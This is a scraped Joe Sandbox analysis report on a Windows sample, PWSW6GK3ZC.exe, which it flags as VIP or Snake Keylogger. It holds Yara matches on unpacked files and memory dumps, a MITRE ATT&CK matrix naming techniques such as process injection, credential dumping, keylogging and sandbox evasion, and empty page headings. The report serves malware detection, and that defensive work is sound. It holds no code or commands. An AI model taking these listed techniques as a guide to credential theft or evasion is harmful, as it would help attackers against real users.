Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.1eeb11e6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21e90000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.fpnevlzQ.pif.21740f20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fpnevlzQ.pif PID: 4536, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	31 Obfuscated Files or Information	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	341 Security Software Discovery	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	41 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PWSW6GK3ZC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
PWSW6GK3ZC.exe